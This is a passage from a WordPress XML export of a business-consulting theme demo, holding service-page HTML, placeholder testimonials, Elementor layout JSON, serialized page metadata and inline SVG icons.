				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box2-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box2-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box5-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box5-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Functions</a></h5>				<p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box6-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box6-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></h5>				<p>We identify the mission, goals and strategic priorities of a business project or non-profit organization.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Explore More</a>	    
	        testimonials	        <h3>What People Say About Us</h3>	    
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Mary Grey</h6>							client of company						
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Samanta Fox</h6>							client of company						
		        <a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure></a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>868</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 08:07:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 08:07:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"50913d0","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6431d9b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"2d79a54","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"d6f8efd","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"403e7f7","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"53a4218","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"40e4f84","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"33cde09","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"99d507e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"8bc24d4","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"beb742d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3c860b2","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box2.jpg","id":903},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"44fef9d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"5e5c00d","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true},{"id":"89aa30f","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width"},"elements":[{"id":"d6a51ae","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"edcdae5","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"9ec60d8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"880ea70","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"e248180","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"ec9ed31","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"6dc6dd7","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"7a91f5f","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"5e9f9e9","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a13a110","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box5.jpg","id":906},"title":"Support Functions","des":"Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"5df37f4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1cb357c","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box6.jpg","id":907},"title":"Finance Planning","des":"We identify the mission, goals and strategic priorities of a business project or non-profit organization.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"da8c1a3","elType":"section","settings":{"background_background":"classic","background_color":"#F8F8F8","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-grid.jpg","id":878},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","background_bg_width_tablet":{"unit":"px","size":0,"sizes":[]},"padding":{"unit":"px","top":"150","right":"0","bottom":"120","left":"0","isLinked":false},"gap":"extended","structure":"20","background_position_tablet":"center right","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"e17a0cf","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[],"isInner":false},{"id":"46be8a0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"b31309c","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"1cb8d1d","elType":"widget","settings":{"align":"left","testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"","id":""},"tname":"Oliver Simson","tjob":"client of company","_id":"4071f49"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Mary Grey","tjob":"client of company","_id":"0a8366e"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Samanta Fox","tjob":"client of company","_id":"aeffe7c"}],"dots_style":"vertical","dots_spacing":{"unit":"px","size":-300,"sizes":[]},"dots_spacing_tablet":{"unit":"px","size":-70,"sizes":[]},"_margin":{"unit":"%","top":"0","right":"-5","bottom":"0","left":"0","isLinked":false},"arrow_align":"bottom","_padding_tablet":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"itestimonials2"}],"isInner":false}],"isInner":false},{"id":"1ce3e2f","elType":"section","settings":{"background_background":"classic","background_color":"#262832","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"fe015a4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"719b6b2","elType":"widget","settings":{"image_carousel":[{"_id":"e5f9d6d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":510},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"5966eb5","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":511},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"d89b073","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":512},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"6663b67","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":513},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"23bce51","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":514},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"70a824d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":515},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}}],"tshow":"6","tshow_tablet":"3","dots":"false"},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:10;}}s:8:"advanced";a:1:{s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:14:"subtitle_style";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:5;}s:14:"section_layout";a:2:{s:6:"layout";i:4;s:3:"gap";i:4;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;}s:19:"_section_responsive";a:1:{s:12:"hide_desktop";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:8:{s:21:"background_background";i:3;s:16:"background_color";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:26:"background_bg_width_tablet";i:1;s:26:"background_position_tablet";i:1;}}}}s:10:"iimage_box";a:3:{s:5:"count";i:8;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:8;s:4:"link";i:8;s:5:"title";i:7;s:3:"des";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:10:"radius_box";i:8;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:5:"align";i:1;s:12:"testi_slider";i:1;s:10:"dots_style";i:1;s:11:"arrow_align";i:1;}}s:5:"style";a:1:{s:18:"navigation_section";a:2:{s:12:"dots_spacing";i:1;s:19:"dots_spacing_tablet";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Services With Icon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/services-with-icon/</link>
		<pubDate>Fri, 11 Sep 2020 10:16:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=885</guid>
		<description></description>
		<content:encoded><![CDATA[Improve Your Business	        <h3>We Offer Great<br> Number of Finance Services</h3>	    
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitor, consumer, product, etc.)</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
